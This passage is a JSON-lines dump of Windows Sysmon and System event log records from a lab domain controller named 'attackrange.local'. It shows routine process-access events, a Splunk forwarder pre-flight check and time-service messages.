{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2043,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2044,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2045,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2046,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.564\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-001072EA0300}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.564","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-001072EA0300}","TargetProcessId":"3956","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76826,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The NetSetupSvc service entered the stopped state.","param1":"NetSetupSvc","param2":"stopped","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":139,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76827,"ProcessID":1216,"ThreadID":3964,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has started advertising as a time source.","Opcode":"Info","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":143,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76828,"ProcessID":1216,"ThreadID":3964,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has started advertising as a good time source.","Opcode":"Info","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2047,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.799\r\nSourceProcessGUID: {41C8662E-1F77-5F25-0000-001072EA0300}\r\nSourceProcessId: 3956\r\nSourceThreadId: 3960\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.799","SourceProcessGUID":"{41C8662E-1F77-5F25-0000-001072EA0300}","SourceProcessId":"3956","SourceThreadId":"3960","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2048,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.822\r\nProcessGuid: {41C8662E-1F77-5F25-0000-00103BEE0300}\r\nProcessId: 3984\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nParentProcessId: 3824\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.822","ProcessGuid":"{41C8662E-1F77-5F25-0000-00103BEE0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F75-5F25-0000-00106CC50300}","ParentProcessId":"3824","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2049,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nSourceProcessId: 3824\r\nSourceThreadId: 3888\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-00103BEE0300}\r\nTargetProcessId: 3984\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18319|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-00106CC50300}","SourceProcessId":"3824","SourceThreadId":"3888","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-00103BEE0300}","TargetProcessId":"3984","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18319|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2050,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-00103BEE0300}\r\nTargetProcessId: 3984\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-00103BEE0300}","TargetProcessId":"3984","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2051,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 